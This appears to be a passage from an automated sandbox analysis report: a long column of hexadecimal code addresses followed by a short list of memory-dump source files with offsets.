                                                                                                                                    0x004073e2
                                                                                                                                    0x004073f1
                                                                                                                                    0x004073f5
                                                                                                                                    0x004073f5
                                                                                                                                    0x0040741a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040741c
                                                                                                                                    0x00407420
                                                                                                                                    0x004075cf
                                                                                                                                    0x004075e5
                                                                                                                                    0x004075ed
                                                                                                                                    0x004075f4
                                                                                                                                    0x004075f6
                                                                                                                                    0x004075fd
                                                                                                                                    0x00407601
                                                                                                                                    0x00407601
                                                                                                                                    0x0040742c
                                                                                                                                    0x00407433
                                                                                                                                    0x0040743b
                                                                                                                                    0x0040743e
                                                                                                                                    0x00407441
                                                                                                                                    0x00407441
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00406be3
                                                                                                                                    0x00406be3
                                                                                                                                    0x00406be3
                                                                                                                                    0x00406bec
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bfd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c06
                                                                                                                                    0x00406c09
                                                                                                                                    0x00406c0c
                                                                                                                                    0x00406c10
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c16
                                                                                                                                    0x00406c19
                                                                                                                                    0x00406c1b
                                                                                                                                    0x00406c1c
                                                                                                                                    0x00406c1f
                                                                                                                                    0x00406c21
                                                                                                                                    0x00406c22
                                                                                                                                    0x00406c24
                                                                                                                                    0x00406c27
                                                                                                                                    0x00406c2c
                                                                                                                                    0x00406c31
                                                                                                                                    0x00406c3a
                                                                                                                                    0x00406c4d
                                                                                                                                    0x00406c50
                                                                                                                                    0x00406c5c
                                                                                                                                    0x00406c84
                                                                                                                                    0x00406c86
                                                                                                                                    0x00406c94
                                                                                                                                    0x00406c94
                                                                                                                                    0x00406c98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c8b
                                                                                                                                    0x00406c8c
                                                                                                                                    0x00406c8c
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c62
                                                                                                                                    0x00406c67
                                                                                                                                    0x00406c67
                                                                                                                                    0x00406c70
                                                                                                                                    0x00406c78
                                                                                                                                    0x00406c7b
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c81
                                                                                                                                    0x00406c81
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c81
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c9e
                                                                                                                                    0x00406c9e
                                                                                                                                    0x00406ca2
                                                                                                                                    0x0040754e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040754e
                                                                                                                                    0x00406cab
                                                                                                                                    0x00406cbb
                                                                                                                                    0x00406cbe
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc4
                                                                                                                                    0x00406cc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406cca
                                                                                                                                    0x00406cd0
                                                                                                                                    0x00406cfa
                                                                                                                                    0x00406d00
                                                                                                                                    0x00406d07
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d07
                                                                                                                                    0x00406cd6
                                                                                                                                    0x00406cd9
                                                                                                                                    0x00406cde
                                                                                                                                    0x00406cde
                                                                                                                                    0x00406ce9
                                                                                                                                    0x00406cf1
                                                                                                                                    0x00406cf4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d39
                                                                                                                                    0x00406d3f
                                                                                                                                    0x00406d42
                                                                                                                                    0x00406d4f
                                                                                                                                    0x00406d57
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d0e
                                                                                                                                    0x00406d0e
                                                                                                                                    0x00406d12
                                                                                                                                    0x0040755d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040755d
                                                                                                                                    0x00406d1e
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d2c
                                                                                                                                    0x00406d2f
                                                                                                                                    0x00406d32
                                                                                                                                    0x00406d37
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073d4
                                                                                                                                    0x004073da
                                                                                                                                    0x004073e0
                                                                                                                                    0x004073fa
                                                                                                                                    0x004073fd
                                                                                                                                    0x00407403
                                                                                                                                    0x0040740e
                                                                                                                                    0x00407410
                                                                                                                                    0x004073e2
                                                                                                                                    0x004073e2
                                                                                                                                    0x004073f1
                                                                                                                                    0x004073f5
                                                                                                                                    0x004073f5
                                                                                                                                    0x0040741a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d5f
                                                                                                                                    0x00406d61
                                                                                                                                    0x00406d64
                                                                                                                                    0x00406dd5
                                                                                                                                    0x00406dd8
                                                                                                                                    0x00406ddb
                                                                                                                                    0x00406de2
                                                                                                                                    0x00406dec
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x00406d66
                                                                                                                                    0x00406d6a
                                                                                                                                    0x00406d6d
                                                                                                                                    0x00406d6f
                                                                                                                                    0x00406d72
                                                                                                                                    0x00406d75
                                                                                                                                    0x00406d77
                                                                                                                                    0x00406d7a
                                                                                                                                    0x00406d7c
                                                                                                                                    0x00406d81
                                                                                                                                    0x00406d84
                                                                                                                                    0x00406d87
                                                                                                                                    0x00406d8b
                                                                                                                                    0x00406d92
                                                                                                                                    0x00406d95
                                                                                                                                    0x00406d9c
                                                                                                                                    0x00406da0
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406dac
                                                                                                                                    0x00406daf
                                                                                                                                    0x00406dcd
                                                                                                                                    0x00406dcf
                                                                                                                                    0x00000000
                                                                                                                                    0x00406db1
                                                                                                                                    0x00406db1
                                                                                                                                    0x00406db4
                                                                                                                                    0x00406db7
                                                                                                                                    0x00406dba
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbf
                                                                                                                                    0x00406dc2
                                                                                                                                    0x00406dc4
                                                                                                                                    0x00406dc5
                                                                                                                                    0x00406dc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00406dc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407068
                                                                                                                                    0x0040706c
                                                                                                                                    0x0040708f
                                                                                                                                    0x00407092
                                                                                                                                    0x00407095
                                                                                                                                    0x0040709f
                                                                                                                                    0x0040706e
                                                                                                                                    0x0040706e
                                                                                                                                    0x00407071
                                                                                                                                    0x00407074
                                                                                                                                    0x00407077
                                                                                                                                    0x00407084
                                                                                                                                    0x00407087
                                                                                                                                    0x00407087
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004070ab
                                                                                                                                    0x004070af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070b5
                                                                                                                                    0x004070b9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070bf
                                                                                                                                    0x004070c1
                                                                                                                                    0x004070c5
                                                                                                                                    0x004070c5
                                                                                                                                    0x004070c8
                                                                                                                                    0x004070cc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040711c
                                                                                                                                    0x00407120
                                                                                                                                    0x00407127
                                                                                                                                    0x0040712a
                                                                                                                                    0x0040712d
                                                                                                                                    0x00407137
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00407122
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407143
                                                                                                                                    0x00407147
                                                                                                                                    0x0040714e
                                                                                                                                    0x00407151
                                                                                                                                    0x00407154
                                                                                                                                    0x00407149
                                                                                                                                    0x00407149
                                                                                                                                    0x00407149
                                                                                                                                    0x00407157
                                                                                                                                    0x0040715a
                                                                                                                                    0x0040715d
                                                                                                                                    0x0040715d
                                                                                                                                    0x00407160
                                                                                                                                    0x00407163
                                                                                                                                    0x00407166
                                                                                                                                    0x00407166
                                                                                                                                    0x00407169
                                                                                                                                    0x00407170
                                                                                                                                    0x00407175
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407203
                                                                                                                                    0x00407203
                                                                                                                                    0x00407207
                                                                                                                                    0x004075a5
                                                                                                                                    0x00000000
                                                                                                                                    0x004075a5
                                                                                                                                    0x0040720d
                                                                                                                                    0x00407210
                                                                                                                                    0x00407213
                                                                                                                                    0x00407217
                                                                                                                                    0x0040721a
                                                                                                                                    0x00407220
                                                                                                                                    0x00407222
                                                                                                                                    0x00407222
                                                                                                                                    0x00407222
                                                                                                                                    0x00407225
                                                                                                                                    0x00407228
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406df8
                                                                                                                                    0x00406df8
                                                                                                                                    0x00406dfc
                                                                                                                                    0x00407569
                                                                                                                                    0x00000000
                                                                                                                                    0x00407569
                                                                                                                                    0x00406e02
                                                                                                                                    0x00406e05
                                                                                                                                    0x00406e08
                                                                                                                                    0x00406e0c
                                                                                                                                    0x00406e0f
                                                                                                                                    0x00406e15
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e1a
                                                                                                                                    0x00406e1d
                                                                                                                                    0x00406e1d
                                                                                                                                    0x00406e20
                                                                                                                                    0x00406e23
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406e29
                                                                                                                                    0x00406e2f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406e35
                                                                                                                                    0x00406e35
                                                                                                                                    0x00406e39
                                                                                                                                    0x00406e3c
                                                                                                                                    0x00406e3f
                                                                                                                                    0x00406e42
                                                                                                                                    0x00406e45
                                                                                                                                    0x00406e46
                                                                                                                                    0x00406e49
                                                                                                                                    0x00406e4b
                                                                                                                                    0x00406e51
                                                                                                                                    0x00406e54
                                                                                                                                    0x00406e57
                                                                                                                                    0x00406e5a
                                                                                                                                    0x00406e5d
                                                                                                                                    0x00406e60
                                                                                                                                    0x00406e63
                                                                                                                                    0x00406e7f
                                                                                                                                    0x00406e82
                                                                                                                                    0x00406e85
                                                                                                                                    0x00406e88
                                                                                                                                    0x00406e8f
                                                                                                                                    0x00406e93
                                                                                                                                    0x00406e95
                                                                                                                                    0x00406e99
                                                                                                                                    0x00406e65
                                                                                                                                    0x00406e65
                                                                                                                                    0x00406e69
                                                                                                                                    0x00406e71
                                                                                                                                    0x00406e76
                                                                                                                                    0x00406e78
                                                                                                                                    0x00406e7a
                                                                                                                                    0x00406e7a
                                                                                                                                    0x00406e9c
                                                                                                                                    0x00406ea3
                                                                                                                                    0x00406ea6
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eac
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eac
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eb1
                                                                                                                                    0x00406eb1
                                                                                                                                    0x00406eb5
                                                                                                                                    0x00407575
                                                                                                                                    0x00000000
                                                                                                                                    0x00407575
                                                                                                                                    0x00406ebb
                                                                                                                                    0x00406ebe
                                                                                                                                    0x00406ec1
                                                                                                                                    0x00406ec5
                                                                                                                                    0x00406ec8
                                                                                                                                    0x00406ece
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed3
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406edc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ede
                                                                                                                                    0x00406ee1
                                                                                                                                    0x00406ee4
                                                                                                                                    0x00406ee7
                                                                                                                                    0x00406eea
                                                                                                                                    0x00406eed
                                                                                                                                    0x00406ef0
                                                                                                                                    0x00406ef3
                                                                                                                                    0x00406ef6
                                                                                                                                    0x00406ef9
                                                                                                                                    0x00406efc
                                                                                                                                    0x00406f14
                                                                                                                                    0x00406f17
                                                                                                                                    0x00406f1a
                                                                                                                                    0x00406f1d
                                                                                                                                    0x00406f1d
                                                                                                                                    0x00406f20
                                                                                                                                    0x00406f24
                                                                                                                                    0x00406f26
                                                                                                                                    0x00406efe
                                                                                                                                    0x00406efe
                                                                                                                                    0x00406f06
                                                                                                                                    0x00406f0b
                                                                                                                                    0x00406f0d
                                                                                                                                    0x00406f0f
                                                                                                                                    0x00406f0f
                                                                                                                                    0x00406f29
                                                                                                                                    0x00406f30
                                                                                                                                    0x00406f33
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f35
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f35
                                                                                                                                    0x00406f33
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f79
                                                                                                                                    0x00407581
                                                                                                                                    0x00000000
                                                                                                                                    0x00407581
                                                                                                                                    0x00406f7f
                                                                                                                                    0x00406f82
                                                                                                                                    0x00406f85
                                                                                                                                    0x00406f89
                                                                                                                                    0x00406f8c
                                                                                                                                    0x00406f92
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f97
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406fa0
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f41
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f41
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa5
                                                                                                                                    0x00406fa8
                                                                                                                                    0x00406fab
                                                                                                                                    0x00406fae
                                                                                                                                    0x00406fb1
                                                                                                                                    0x00406fb4
                                                                                                                                    0x00406fb7
                                                                                                                                    0x00406fba
                                                                                                                                    0x00406fbd
                                                                                                                                    0x00406fc0
                                                                                                                                    0x00406fd8
                                                                                                                                    0x00406fdb
                                                                                                                                    0x00406fde
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe4
                                                                                                                                    0x00406fe8
                                                                                                                                    0x00406fea
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fca
                                                                                                                                    0x00406fcf
                                                                                                                                    0x00406fd1
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fed
                                                                                                                                    0x00406ff4
                                                                                                                                    0x00406ff7
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00407286
                                                                                                                                    0x00407286
                                                                                                                                    0x0040728a
                                                                                                                                    0x004075b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004075b1
                                                                                                                                    0x00407290
                                                                                                                                    0x00407293
                                                                                                                                    0x00407296
                                                                                                                                    0x0040729a
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a3
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407056
                                                                                                                                    0x00407056
                                                                                                                                    0x00407059
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00407395
                                                                                                                                    0x00407399
                                                                                                                                    0x004073bb
                                                                                                                                    0x004073be
                                                                                                                                    0x004073c8
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739e
                                                                                                                                    0x004073a2
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407452
                                                                                                                                    0x00407456
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x0040747b
                                                                                                                                    0x00407482
                                                                                                                                    0x00407489
                                                                                                                                    0x00407489
                                                                                                                                    0x00000000
                                                                                                                                    0x00407489
                                                                                                                                    0x00407458
                                                                                                                                    0x0040745b
                                                                                                                                    0x0040745e
                                                                                                                                    0x00407461
                                                                                                                                    0x00407468
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407543
                                                                                                                                    0x00407546
                                                                                                                                    0x00407447
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040717d
                                                                                                                                    0x0040717f
                                                                                                                                    0x00407186
                                                                                                                                    0x00407187
                                                                                                                                    0x00407189
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407194
                                                                                                                                    0x00407197
                                                                                                                                    0x0040719a
                                                                                                                                    0x0040719c
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719f
                                                                                                                                    0x004071a2
                                                                                                                                    0x004071a9
                                                                                                                                    0x004071ac
                                                                                                                                    0x004071ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407490
                                                                                                                                    0x00407490
                                                                                                                                    0x00407493
                                                                                                                                    0x0040749a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040749f
                                                                                                                                    0x0040749f
                                                                                                                                    0x004074a3
                                                                                                                                    0x004075db
                                                                                                                                    0x00000000
                                                                                                                                    0x004075db
                                                                                                                                    0x004074a9
                                                                                                                                    0x004074ac
                                                                                                                                    0x004074af
                                                                                                                                    0x004074b3
                                                                                                                                    0x004074b6
                                                                                                                                    0x004074bc
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074c1
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074cb
                                                                                                                                    0x0040752b
                                                                                                                                    0x0040752e
                                                                                                                                    0x00407533
                                                                                                                                    0x00407534
                                                                                                                                    0x00407536
                                                                                                                                    0x00407538
                                                                                                                                    0x0040753b
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00000000
                                                                                                                                    0x0040744d
                                                                                                                                    0x00407447
                                                                                                                                    0x004074cd
                                                                                                                                    0x004074d3
                                                                                                                                    0x004074d6
                                                                                                                                    0x004074d9
                                                                                                                                    0x004074dc
                                                                                                                                    0x004074df
                                                                                                                                    0x004074e2
                                                                                                                                    0x004074e5
                                                                                                                                    0x004074e8
                                                                                                                                    0x004074eb
                                                                                                                                    0x004074ee
                                                                                                                                    0x00407507
                                                                                                                                    0x0040750a
                                                                                                                                    0x0040750d
                                                                                                                                    0x00407510
                                                                                                                                    0x00407514
                                                                                                                                    0x00407516
                                                                                                                                    0x00407516
                                                                                                                                    0x00407517
                                                                                                                                    0x0040751a
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f8
                                                                                                                                    0x004074fd
                                                                                                                                    0x004074ff
                                                                                                                                    0x00407502
                                                                                                                                    0x00407502
                                                                                                                                    0x0040751d
                                                                                                                                    0x00407524
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x004071c2
                                                                                                                                    0x004071c5
                                                                                                                                    0x004071fb
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732e
                                                                                                                                    0x0040732e
                                                                                                                                    0x00407331
                                                                                                                                    0x00407333
                                                                                                                                    0x004075bd
                                                                                                                                    0x00000000
                                                                                                                                    0x004075bd
                                                                                                                                    0x00407339
                                                                                                                                    0x0040733c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407342
                                                                                                                                    0x00407346
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00000000
                                                                                                                                    0x00407349
                                                                                                                                    0x004071c7
                                                                                                                                    0x004071c9
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071cd
                                                                                                                                    0x004071d0
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071db
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f6
                                                                                                                                    0x0040722e
                                                                                                                                    0x0040722e
                                                                                                                                    0x00407232
                                                                                                                                    0x0040725e
                                                                                                                                    0x00407260
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726d
                                                                                                                                    0x00407272
                                                                                                                                    0x00407272
                                                                                                                                    0x00407274
                                                                                                                                    0x00407277
                                                                                                                                    0x0040727e
                                                                                                                                    0x00407281
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072b1
                                                                                                                                    0x004072b4
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00000000
                                                                                                                                    0x00407328
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072bc
                                                                                                                                    0x004072bf
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x004072c8
                                                                                                                                    0x004072cb
                                                                                                                                    0x004072ce
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072d7
                                                                                                                                    0x004072f0
                                                                                                                                    0x004072f2
                                                                                                                                    0x004072f5
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f9
                                                                                                                                    0x004072fb
                                                                                                                                    0x004072fe
                                                                                                                                    0x00407300
                                                                                                                                    0x00407302
                                                                                                                                    0x00407305
                                                                                                                                    0x00407307
                                                                                                                                    0x0040730a
                                                                                                                                    0x0040730e
                                                                                                                                    0x00407310
                                                                                                                                    0x00407310
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x00407317
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072e1
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072e8
                                                                                                                                    0x004072eb
                                                                                                                                    0x004072eb
                                                                                                                                    0x0040731a
                                                                                                                                    0x00407321
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407321
                                                                                                                                    0x00407234
                                                                                                                                    0x00407237
                                                                                                                                    0x00407239
                                                                                                                                    0x0040723c
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407242
                                                                                                                                    0x00407244
                                                                                                                                    0x00407247
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724d
                                                                                                                                    0x0040724d
                                                                                                                                    0x00407250
                                                                                                                                    0x00407257
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407257
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071e0
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f48
                                                                                                                                    0x0040758d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040758d
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f51
                                                                                                                                    0x00406f54
                                                                                                                                    0x00406f57
                                                                                                                                    0x00406f5a
                                                                                                                                    0x00406f5d
                                                                                                                                    0x00406f60
                                                                                                                                    0x00406f62
                                                                                                                                    0x00406f65
                                                                                                                                    0x00406f68
                                                                                                                                    0x00406f6b
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070d3
                                                                                                                                    0x00407599
                                                                                                                                    0x00000000
                                                                                                                                    0x00407599
                                                                                                                                    0x004070d9
                                                                                                                                    0x004070dc
                                                                                                                                    0x004070df
                                                                                                                                    0x004070e2
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e7
                                                                                                                                    0x004070ea
                                                                                                                                    0x004070ed
                                                                                                                                    0x004070f0
                                                                                                                                    0x004070f3
                                                                                                                                    0x004070f6
                                                                                                                                    0x004070f7
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070fc
                                                                                                                                    0x004070ff
                                                                                                                                    0x00407102
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407108
                                                                                                                                    0x0040710a
                                                                                                                                    0x0040710a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x00407350
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407356
                                                                                                                                    0x00407359
                                                                                                                                    0x0040735c
                                                                                                                                    0x0040735f
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407364
                                                                                                                                    0x00407367
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736d
                                                                                                                                    0x00407370
                                                                                                                                    0x00407373
                                                                                                                                    0x00407374
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407379
                                                                                                                                    0x0040737c
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407385
                                                                                                                                    0x00407389
                                                                                                                                    0x0040738b
                                                                                                                                    0x0040738e
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040710d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040738e
                                                                                                                                    0x004075c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2
                                                                                                                                    0x004075fa
                                                                                                                                    0x004075fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004075fa
                                                                                                                                    0x00407447
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00407002

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
